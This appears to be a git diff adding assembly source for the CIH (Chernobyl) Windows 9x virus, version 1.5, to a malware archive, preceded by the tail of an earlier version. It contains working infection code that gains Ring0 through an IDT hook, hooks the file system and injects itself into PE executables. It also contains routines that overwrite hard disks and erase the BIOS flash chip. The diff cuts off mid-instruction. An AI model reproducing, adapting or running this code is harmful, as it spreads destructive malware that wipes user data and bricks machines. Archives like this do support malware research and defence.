mov eax, 0f5555h + pop ecx + mov ch, 0aah + call ebx + mov byte ptr [eax], 20h + loop $ +; *********************** +; * Kill the BIOS Main * +; * ROM Data in Memory * +; * 000FE000 - 000FE07F * +; * ( 80h Bytes ) * +; *********************** + mov ah, 0e0h + mov [eax], al +; *********************** +; * Hide BIOS Page in * +; * 000F0000 - 000FFFFF * +; * ( 64 KB ) * +; *********************** + ; or al,10h + mov word ptr (BooleanCalculateCode-@10)[esi], 100ch + call esi +; *************************** +; * Kill All HardDisk * +; *************************************************** +; * IOR Structure of IOS_SendCommand Needs * +; *************************************************** +; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? * +; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? * +; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? * +; *************************************************** +KillHardDisk: + xor ebx, ebx + mov bh, FirstKillHardDiskNumber + push ebx + sub esp, 2ch + push 0c0001000h + mov bh, 08h + push ebx + push ecx + push ecx + push ecx + push 40000501h + inc ecx + push ecx + push ecx + mov esi, esp + sub esp, 0ach +LoopOfKillHardDisk: + int 20h + dd 00100004h ; VXDCall IOS_SendCommand + cmp word ptr [esi+06h], 0017h + je KillNextDataSection +ChangeNextHardDisk: + inc byte ptr [esi+4dh] + jmp LoopOfKillHardDisk +KillNextDataSection: + add dword ptr [esi+10h], ebx + mov byte ptr [esi+4dh], FirstKillHardDiskNumber + jmp LoopOfKillHardDisk +; *************************** +; * Enable EEPROM to Write * +; *************************** +EnableEEPROMToWrite: + mov [eax], cl + mov [ecx], al + mov byte ptr [eax], 80h + mov [eax], cl + mov [ecx], al + ret +; *************************** +; * IO for EEPROM * +; *************************** +IOForEEPROM: +@10 = IOForEEPROM + xchg eax, edi + xchg edx, ebp + out dx, eax + xchg eax, edi + xchg edx, ebp + in al, dx +BooleanCalculateCode = $ + or al, 44h + xchg eax, edi + xchg edx, ebp + out dx, eax + xchg eax, edi + xchg edx, ebp + out dx, al + ret +; ********************************************************* +; * Static Data * +; ********************************************************* +LastVxDCallAddress = IFSMgr_Ring0_FileIO +VxDCallAddressTable db 00h + db IFSMgr_RemoveFileSystemApiHook-_PageAllocate + db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook + db IFSMgr_Ring0_FileIO-UniToBCSPath +VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h +VxDCallTableSize = ($-VxDCallIDTable)/04h +; ********************************************************* +; * Virus Version Copyright * +; ********************************************************* +VirusVersionCopyright db 'CIH v' + db MajorVirusVersion+'0' + db '.' + db MinorVirusVersion+'0' + db ' TTIT' +; ********************************************************* +; * Virus Size * +; ********************************************************* +VirusSize = $ +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) +; ********************************************************* +; * Dynamic Data * +; ********************************************************* +VirusGameDataStartAddress = VirusSize +@6 = VirusGameDataStartAddress +OnBusy db 0 +FileModificationTime dd ? + +FileNameBuffer db FileNameBufferSize dup(?) +@7 = FileNameBuffer + +DataBuffer = $ +@8 = DataBuffer +NumberOfSections dw ? +TimeDateStamp dd ? +SymbolsPointer dd ? +NumberOfSymbols dd ? +SizeOfOptionalHeader dw ? +_Characteristics dw ? +Magic dw ? +LinkerVersion dw ? +SizeOfCode dd ? +SizeOfInitializedData dd ? +SizeOfUninitializedData dd ? +AddressOfEntryPoint dd ? +BaseOfCode dd ? +BaseOfData dd ? +ImageBase dd ? +@9 = $ +SectionAlignment dd ? +FileAlignment dd ? +OperatingSystemVersion dd ? +ImageVersion dd ? +SubsystemVersion dd ? +Reserved dd ? +SizeOfImage dd ? +SizeOfHeaders dd ? +SizeOfImageHeaderToRead = $-NumberOfSections + +NewAddressOfEntryPoint = DataBuffer ; DWORD +SizeOfImageHeaderToWrite = 04h + +StartOfSectionTable = @9 +SectionName = StartOfSectionTable ; QWORD +VirtualSize = StartOfSectionTable+08h ; DWORD +VirtualAddress = StartOfSectionTable+0ch ; DWORD +SizeOfRawData = StartOfSectionTable+10h ; DWORD +PointerToRawData = StartOfSectionTable+14h ; DWORD +PointerToRelocations = StartOfSectionTable+18h ; DWORD +PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD +NumberOfRelocations = StartOfSectionTable+20h ; WORD +NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD +Characteristics = StartOfSectionTable+24h ; DWORD +SizeOfScetionTable = Characteristics+04h-SectionName +; ********************************************************* +; * Virus Total Need Memory * +; ********************************************************* +VirusNeedBaseMemory = $ +VirusTotalNeedMemory = @9 +; + NumberOfSections(??)*SizeOfScetionTable(28h) +; + SizeOfVirusCodeSectionTableEndMark(04h) +; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h) +; + SizeOfTheFirstVirusCodeSectionTable(04h) +; ********************************************************* +VirusGame ENDS + END FileHeader \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.cih15.asm b/MSDOS/Virus.MSDOS.Unknown.cih15.asm new file mode 100644 index 00000000..a03c5e14 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cih15.asm @@ -0,0 +1,1402 @@ +; **************************************************************************** +; * The Virus Program Information * +; **************************************************************************** +; * * +; * Designer : CIH Source : TTIT of TATUNG in Taiwan * +; * Create Date : 04/26/1998 E-mail : WinCIH.Tatung@usa.net * +; * Modification Time : 06/01/1998 Version : 1.5 * +; * * +; * Turbo Assembler Version 5.0 : Tasm /m cih * +; * Turbo Link Version 5.01 : Tlink /3 /t cih, cih.exe * +; * * +; *==========================================================================* +; * Modification History * +; *==========================================================================* +; * v1.0 1. Create the Virus Program. * +; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * +; * 04/26/1998 3. Virus Code doesn't Reload into System. * +; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * +; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * +; * 6. When System Opens Existing PE File, the File will be * +; * Infected, and the File doesn't be Reinfected. * +; * 7. It is also Infected, even the File is Read-Only. * +; * 8. When the File is Infected, the Modification Date and Time * +; * of the File also don't be Changed. * +; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * +; * Previous FileSystemApiHook, it will Call the Function * +; * that the IFS Manager Would Normally Call to Implement * +; * this Particular I/O Request. * +; * 10. The Virus Size is only 656 Bytes. * +; *==========================================================================* +; * v1.1 1. Especially, the File that be Infected will not Increase * +; * it's Size... ^__^ * +; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * +; * When Exception Error Occurs, Our OS System should be in * +; * Windows NT. So My Cute Virus will not Continue to Run, * +; * it will Jmup to Original Application to Run. * +; * 3. Use Better Algorithm, Reduce Virus Code Size. * +; * 4. The Virus "Basic" Size is only 796 Bytes. * +; *==========================================================================* +; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * +; * 2. Modify the Bug of v1.1 * +; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * +; *==========================================================================* +; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * +; * So When Open WinZip Self-Extractor ==> Don't Infect it. * +; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. * +; *==========================================================================* +; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. * +; * 2. Change the Date of Killing Computers. * +; * 05/31/1998 3. Modify Virus Version Copyright. * +; * 4. The Virus "Basic" Size is 1019 Bytes. * +; **************************************************************************** +; * v1.5 1. Full Modify the Bug : Change Harddisk Killing Port * +; * 2. Modify Virus Version Copyright. * +; * 06/01/1998 3. Clear Garbage in Source Code. * +; * 4. The Virus "Small" Size in 10xx Bytes. * +; **************************************************************************** + + .586 + +; **************************************************************************** +; * Original PE Executable File(Don't Modify this Section) * +; **************************************************************************** + +OriginalAppEXE SEGMENT + +FileHeader: + db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h + db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h + db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh + db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h + db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h + db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh + db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh + db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h + db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah + db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h + db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h + db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h + db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h + db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h + dd 00000000h, VirusSize + +OriginalAppEXE ENDS + +; **************************************************************************** +; * My Virus Game * +; **************************************************************************** + +; ********************************************************* +; * Constant Define * +; ********************************************************* + +TRUE = 1 +FALSE = 0 + +DEBUG = TRUE + +IF DEBUG + + FirstKillHardDiskNumber = 82h + HookExceptionNumber = 06h + +ELSE + + FirstKillHardDiskNumber = 81h + HookExceptionNumber = 04h + +ENDIF + + +FileNameBufferSize = 7fh + +; ********************************************************* +; ********************************************************* + +VirusGame SEGMENT + + ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame + ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame + +; ********************************************************* +; * Ring3 Virus Game Initial Program * +; ********************************************************* + +MyVirusStart: + push ebp + +; ************************************* +; * Let's Modify Structured Exception * +; * Handing, Prevent Exception Error * +; * Occurrence, Especially in NT. * +; ************************************* + + lea eax, [esp-04h*2] + xor ebx, ebx + xchg eax, fs:[ebx] + call @0 +@0: + pop ebx + lea ecx, StopToRunVirusCode-@0[ebx] + push ecx + push eax + +; ************************************* +; * Let's Modify * +; * IDT(Interrupt Descriptor Table) * +; * to Get Ring0 Privilege... * +; ************************************* + + push eax ; + sidt [esp-02h] ; Get IDT Base Address + pop ebx ; + add ebx, HookExceptionNumber*08h+04h ; ZF = 0 + cli + mov ebp, [ebx] ; Get Exception Base + mov bp, [ebx-04h] ; Entry Point + lea esi, MyExceptionHook-@1[ecx] + push esi + mov [ebx-04h], si ; + shr esi, 16 ; Modify Exception + mov [ebx+02h], si ; Entry Point Address + pop esi + +; ************************************* +; * Generate Exception to Get Ring0 * +; ************************************* + + int HookExceptionNumber ; GenerateException +ReturnAddressOfEndException = $ + +; ************************************* +; * Merge All Virus Code Section * +; ************************************* + + push esi + mov esi, eax + +LoopOfMergeAllVirusCodeSection: + + mov ecx, [eax-04h] + rep movsb + sub eax, 08h + mov esi, [eax] + or esi, esi + jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 + jmp LoopOfMergeAllVirusCodeSection + +QuitLoopOfMergeAllVirusCodeSection: + + pop esi + +; ************************************* +; * Generate Exception Again * +; ************************************* + + int HookExceptionNumber ; GenerateException Again + +; ************************************* +; * Let's Restore * +; * Structured Exception Handing * +; ************************************* + +ReadyRestoreSE: + sti + xor ebx, ebx + jmp RestoreSE + +; ************************************* +; * When Exception Error Occurs, * +; * Our OS System should be in NT. * +; * So My Cute Virus will not * +; * Continue to Run, it Jmups to * +; * Original Application to Run. * +; ************************************* + +StopToRunVirusCode: +@1 = StopToRunVirusCode + + xor ebx, ebx + mov eax, fs:[ebx] + mov esp, [eax] + +RestoreSE: + pop dword ptr fs:[ebx] + pop eax + +; ************************************* +; * Return Original App to Execute * +; ************************************* + + pop ebp + push 00401000h ; Push Original +OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack + ret ; Return to Original App Entry Point + +; ********************************************************* +; * Ring0 Virus Game Initial Program * +; ********************************************************* + +MyExceptionHook: +@2 = MyExceptionHook + jz InstallMyFileSystemApiHook + +; ************************************* +; * Do My Virus Exist in System !? * +; ************************************* + + mov ecx, dr0 + jecxz AllocateSystemMemoryPage + add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException + +; ************************************* +; * Return to Ring3 Initial Program * +; ************************************* + +ExitRing0Init: + mov [ebx-04h], bp ; + shr ebp, 16 ; Restore Exception + mov [ebx+02h], bp ; + iretd + +; ************************************* +; * Allocate SystemMemory Page to Use * +; ************************************* + +AllocateSystemMemoryPage: + + mov dr0, ebx ; Set the Mark of My Virus Exist in System + push 00000000fh ; + push ecx ; + push 0ffffffffh ; + push ecx ; + push ecx ; + push ecx ; + push 000000001h ; + push 000000002h ; + int 20h ; VMMCALL _PageAllocate +_PageAllocate = $ ; + dd 00010053h ; Use EAX, ECX, EDX, and flags + add esp, 08h*04h + xchg edi, eax ; EDI = SystemMemory Start Address + lea eax, MyVirusStart-@2[esi] + iretd ; Return to Ring3 Initial Program + +; ************************************* +; * Install My File System Api Hook * +; ************************************* + +InstallMyFileSystemApiHook: + + lea eax, FileSystemApiHook-@6[edi] + + push eax ; + int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook +IFSMgr_InstallFileSystemApiHook = $ + dd 00400067h ; Use EAX, ECX, EDX, and flags + mov dr0, eax ; Save OldFileSystemApiHook Address + pop eax ; EAX = FileSystemApiHook Address + ; Save Old IFSMgr_InstallFileSystemApiHook Entry Point + mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi] + mov edx, [ecx] + mov OldInstallFileSystemApiHook-@3[eax], edx + ; Modify IFSMgr_InstallFileSystemApiHook Entry Point + lea eax, InstallFileSystemApiHook-@3[eax] + mov [ecx], eax + cli + jmp ExitRing0Init + +; ********************************************************* +; * Code Size of Merge Virus Code Section * +; ********************************************************* + +CodeSizeOfMergeVirusCodeSection = offset $ + +; ********************************************************* +; * IFSMgr_InstallFileSystemApiHook * +; ********************************************************* + +InstallFileSystemApiHook: + push ebx + call @4 ; +@4: ; + pop ebx ; mov ebx, offset FileSystemApiHook + add ebx, FileSystemApiHook-@4 ; + push ebx + int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook +IFSMgr_RemoveFileSystemApiHook = $ + dd 00400068h ; Use EAX, ECX, EDX, and flags + pop eax + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link Client FileSystemApiHook + push dword ptr [esp+8] + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + push eax + ; Call Original IFSMgr_InstallFileSystemApiHook + ; to Link My FileSystemApiHook + push ebx + call OldInstallFileSystemApiHook-@3[ebx] + pop ecx + mov dr0, eax ; Adjust OldFileSystemApiHook Address + pop eax + pop ebx + ret + +; ********************************************************* +; * Static Data * +; ********************************************************* + +OldInstallFileSystemApiHook dd ? + +; ********************************************************* +; * IFSMgr_FileSystemHook * +; ********************************************************* + +; ************************************* +; * IFSMgr_FileSystemHook Entry Point * +; ************************************* + +FileSystemApiHook: +@3 = FileSystemApiHook + + pushad + call @5 ; +@5: ; + pop esi ; mov esi, offset VirusGameDataStartAddress + add esi, VirusGameDataStartAddress-@5 + +; ************************************* +; * Is OnBusy !? * +; ************************************* + + test byte ptr (OnBusy-@6)[esi], 01h ; if ( OnBusy ) + jnz pIFSFunc ; goto pIFSFunc + +; ************************************* +; * Is OpenFile !? * +; ************************************* + + ; if ( NotOpenFile ) + ; goto prevhook + lea ebx, [esp+20h+04h+04h] + cmp dword ptr [ebx], 00000024h + jne prevhook + +; ************************************* +; * Enable OnBusy * +; ************************************* + + inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy + +; ************************************* +; * Get FilePath's DriveNumber, * +; * then Set the DriveName to * +; * FileNameBuffer. * +; ************************************* +; * Ex. If DriveNumber is 03h, * +; * DriveName is 'C:'. * +; ************************************* + + add esi, FileNameBuffer-@6 + push esi + mov al, [ebx+04h] + cmp al, 0ffh + je CallUniToBCSPath + add al, 40h + mov ah, ':' + mov [esi], eax + inc esi + inc esi + +; ************************************* +; * UniToBCSPath * +; ************************************* +; * This Service Converts * +; * a Canonicalized Unicode Pathname * +; * to a Normal Pathname in the * +; * Specified BCS Character Set. * +; ************************************* + +CallUniToBCSPath: + push 00000000h + push FileNameBufferSize + mov ebx, [ebx+10h] + mov eax, [ebx+0ch] + add eax, 04h + push eax + push esi + int 20h ; VXDCall UniToBCSPath +UniToBCSPath = $ + dd 00400041h + add esp, 04h*04h + +; ************************************* +; * Is FileName '.EXE' !? * +; ************************************* + + cmp [esi+eax-04h], 'EXE.' + pop esi + jne DisableOnBusy + +IF DEBUG + +; ************************************* +; * Only for Debug * +; ************************************* + + cmp [esi+eax-06h], 'KCUF' + jne DisableOnBusy + +ENDIF + +; ************************************* +; * Is Open Existing File !? * +; ************************************* + + ; if ( NotOpenExistingFile ) + ; goto DisableOnBusy + cmp word ptr [ebx+18h], 01h + jne DisableOnBusy + +; ************************************* +; * Get Attributes of the File * +; ************************************* + + mov ax, 4300h + int 20h ; VXDCall IFSMgr_Ring0_FileIO +IFSMgr_Ring0_FileIO = $ + dd 00400032h + jc DisableOnBusy + push ecx + +; ************************************* +; * Get IFSMgr_Ring0_FileIO Address * +; ************************************* + + mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] + mov edi, [edi] + +; ************************************* +; * Is Read-Only File !? * +; ************************************* + + test cl, 01h + jz OpenFile + +; ************************************* +; * Modify Read-Only File to Write * +; ************************************* + + mov ax, 4301h + xor ecx, ecx + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Open File * +; ************************************* + +OpenFile: + xor eax, eax + mov ah, 0d5h + xor ecx, ecx + xor edx, edx + inc edx + mov ebx, edx + inc ebx + call edi ; VXDCall IFSMgr_Ring0_FileIO + xchg ebx, eax ; mov ebx, FileHandle + +; ************************************* +; * Need to Restore * +; * Attributes of the File !? * +; ************************************* + + pop ecx + pushf + test cl, 01h + jz IsOpenFileOK + +; ************************************* +; * Restore Attributes of the File * +; ************************************* + + mov ax, 4301h + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; ************************************* +; * Is Open File OK !? * +; ************************************* + +IsOpenFileOK: + popf + jc DisableOnBusy + +; ************************************* +; * Open File Already Succeed. ^__^ * +; ************************************* + + push esi ; Push FileNameBuffer Address to Stack + + pushf ; Now CF = 0, Push Flag to Stack + + add esi, DataBuffer-@7 ; mov esi, offset DataBuffer + +; *************************** +; * Get OffsetToNewHeader * +; *************************** + + xor eax, eax + mov ah, 0d6h + ; For Doing Minimal VirusCode's Length, + ; I Save EAX to EBP. + mov ebp, eax + push 00000004h + pop ecx + push 0000003ch + pop edx + call edi ; VXDCall IFSMgr_Ring0_FileIO + mov edx, [esi] + +; *************************** +; * Get 'PE\0' Signature * +; * of ImageFileHeader, and * +; * Infected Mark. * +; *************************** + + dec edx + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Is PE !? * +; *************************** +; * Is the File * +; * Already Infected !? * +; *************************** +; * WinZip Self-Extractor * +; * doesn't Have Infected * +; * Mark Because My Virus * +; * doesn't Infect it. * +; *************************** + + cmp dword ptr [esi], 00455000h + jne CloseFile + +; ************************************* +; * The File is ^o^ * +; * PE(Portable Executable) indeed. * +; ************************************* +; * The File isn't also Infected. * +; ************************************* + +; ************************************* +; * Start to Infect the File * +; ************************************* +; * Registers Use Status Now : * +; * * +; * EAX = 04h * +; * EBX = File Handle * +; * ECX = 04h * +; * EDX = 'PE\0\0' Signature of * +; * ImageFileHeader Pointer's * +; * Former Byte. * +; * ESI = DataBuffer Address ==> @8 * +; * EDI = IFSMgr_Ring0_FileIO Address * +; * EBP = D600h ==> Read Data in File * +; ************************************* +; * Stack Dump : * +; * * +; * ESP => ------------------------- * +; * | EFLAG(CF=0) | * +; * ------------------------- * +; * | FileNameBufferPointer | * +; * ------------------------- * +; * | EDI | * +; * ------------------------- * +; * | ESI | * +; * ------------------------- * +; * | EBP | * +; * ------------------------- * +; * | ESP | * +; * ------------------------- * +; * | EBX | * +; * ------------------------- * +; * | EDX | * +; * ------------------------- * +; * | ECX | * +; * ------------------------- * +; * | EAX | * +; * ------------------------- * +; * | Return Address | * +; * ------------------------- * +; ************************************* + + push ebx ; Save File Handle + push 00h ; Set VirusCodeSectionTableEndMark + +; *************************** +; * Let's Set the * +; * Virus' Infected Mark * +; *************************** + + push 01h ; Size + push edx ; Pointer of File + push edi ; Address of Buffer + +; *************************** +; * Save ESP Register * +; *************************** + + mov dr1, esp + +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Only First Set Size ) * +; *************************** + + push eax ; Size + +; *************************** +; * Let's Read * +; * Image Header in File * +; *************************** + + mov eax, ebp + mov cl, SizeOfImageHeaderToRead + add edx, 07h ; Move EDX to NumberOfSections + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Let's Set the * +; * NewAddressOfEntryPoint * +; * ( Set Pointer of File, * +; * Address of Buffer ) * +; *************************** + + lea eax, (AddressOfEntryPoint-@8)[edx] + push eax ; Pointer of File + lea eax, (NewAddressOfEntryPoint-@8)[esi] + push eax ; Address of Buffer + +; *************************** +; * Move EDX to the Start * +; * of SectionTable in File * +; *************************** + + movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] + lea edx, [eax+edx+12h] + +; *************************** +; * Let's Get * +; * Total Size of Sections * +; *************************** + + mov al, SizeOfScetionTable + ; I Assume NumberOfSections <= 0ffh + mov cl, (NumberOfSections-@8)[esi] + mul cl + +; *************************** +; * Let's Set Section Table * +; *************************** + + ; Move ESI to the Start of SectionTable + lea esi, (StartOfSectionTable-@8)[esi] + push eax ; Size + push edx ; Pointer of File + push esi ; Address of Buffer + +; *************************** +; * The Code Size of Merge * +; * Virus Code Section and * +; * Total Size of Virus * +; * Code Section Table Must * +; * be Small or Equal the * +; * Unused Space Size of * +; * Following Section Table * +; *************************** + + inc ecx + push ecx ; Save NumberOfSections+1 + shl ecx, 03h + push ecx ; Save TotalSizeOfVirusCodeSectionTable + + add ecx, eax + add ecx, edx + sub ecx, (SizeOfHeaders-@9)[esi] + not ecx + inc ecx + ; Save My Virus First Section Code + ; Size of Following Section Table... + ; ( Not Include the Size of Virus Code Section Table ) + push ecx + xchg ecx, eax ; ECX = Size of Section Table + ; Save Original Address of Entry Point + mov eax, (AddressOfEntryPoint-@9)[esi] + add eax, (ImageBase-@9)[esi] + mov (OriginalAddressOfEntryPoint-@9)[esi], eax + cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection + jl OnlySetInfectedMark + +; *************************** +; * Read All Section Tables * +; *************************** + + mov eax, ebp + call edi ; VXDCall IFSMgr_Ring0_FileIO + +; *************************** +; * Full Modify the Bug : * +; * WinZip Self-Extractor * +; * Occurs Error... * +; *************************** +; * So When User Opens * +; * WinZip Self-Extractor, * +; * Virus Doesn't Infect it.* +; *************************** +; * First, Virus Gets the * +; * PointerToRawData in the * +; * Second Section Table, * +; * Reads the Section Data, * +; * and Tests the String of * +; * 'WinZip(R)'...... * +; *************************** + + xchg eax, ebp + push 00000004h + pop ecx + push edx + mov edx, (SizeOfScetionTable+PointerToRawData-@9)[esi] + add edx, 12h + call edi ; VXDCall IFSMgr_Ring0_FileIO + cmp dword ptr [esi], 'piZniW' + je NotSetInfectedMark + pop edx + +; *************************** +; * Let's Set Total Virus * +; * Code Section Table * +; *************************** + + ; EBX = My Virus First Section Code + ; Size of Following Section Table + pop ebx + pop edi ; EDI = TotalSizeOfVirusCodeSectionTable + pop ecx ; ECX = NumberOfSections+1 + push edi ; Size + add edx, ebp + push edx ; Pointer of File + add ebp, esi + push ebp ; Address of Buffer + +; *************************** +; * Set the First Virus * +; * Code Section Size in * +; * VirusCodeSectionTable * +; *************************** + + lea eax, [ebp+edi-04h] + mov [eax], ebx + +; *************************** +; * Let's Set My Virus * +; * First Section Code * +; *************************** + + push ebx ; Size + add edx, edi + push edx ; Pointer of File + lea edi, (MyVirusStart-@9)[esi] + push edi ; Address of Buffer + +; *************************** +; * Let's Modify the * +; * AddressOfEntryPoint to * +; * My Virus Entry Point * +; *************************** + + mov (NewAddressOfEntryPoint-@9)[esi], edx + +; *************************** +; * Setup Initial Data * +; *************************** + + lea edx, [esi-SizeOfScetionTable] + mov ebp, offset VirusSize + jmp StartToWriteCodeToSections + +; *************************** +; * Write Code to Sections * +; *************************** + +LoopOfWriteCodeToSections: + + add edx, SizeOfScetionTable + mov ebx, (SizeOfRawData-@9)[edx] + sub ebx, (VirtualSize-@9)[edx] + jbe EndOfWriteCodeToSections + push ebx ; Size + sub eax, 08h + mov [eax], ebx + mov ebx, (PointerToRawData-@9)[edx] + add ebx, (VirtualSize-@9)[edx] + push ebx ; Pointer of File + push edi ; Address of Buffer + mov ebx, (VirtualSize-@9)[edx] + add ebx, (VirtualAddress-@9)[edx] + add ebx, (ImageBase-@9)[esi] + mov [eax+4], ebx + mov ebx, [eax] + add (VirtualSize-@9)[edx], ebx + + ; Section contains initialized data ==> 00000040h + ; Section can be Read. ==> 40000000h + or (Characteristics-@9)[edx], 40000040h + +StartToWriteCodeToSections: + + sub ebp, ebx + jbe SetVirusCodeSectionTableEndMark + add edi, ebx ; Move Address of Buffer + +EndOfWriteCodeToSections: + + loop LoopOfWriteCodeToSections + +; *************************** +; * Only Set Infected Mark * +; *************************** + +OnlySetInfectedMark: + mov esp, dr1 + jmp WriteVirusCodeToFile + +; *************************** +; * Not Set Infected Mark * +; *************************** + +NotSetInfectedMark: + add esp, 3ch + jmp CloseFile + +; *************************** +; * Set Virus Code * +; * Section Table End Mark * +; *************************** + +SetVirusCodeSectionTableEndMark: + + ; Adjust Size of Virus Section Code to Correct Value + add [eax], ebp + add [esp+08h], ebp + + ; Set End Mark + xor ebx, ebx + mov [eax-04h], ebx + +; *************************** +; * When VirusGame Calls * +; * VxDCall, VMM Modifies * +; * the 'int 20h' and the * +; * 'Service Identifier' * +; * to 'Call [XXXXXXXX]'. * +; *************************** +; * Before Writing My Virus * +; * to File, I Must Restore * +; * them First. ^__^ * +; *************************** + + lea eax, (LastVxDCallAddress-2-@9)[esi] + mov cl, VxDCallTableSize + +LoopOfRestoreVxDCallID: + mov word ptr [eax], 20cdh + mov 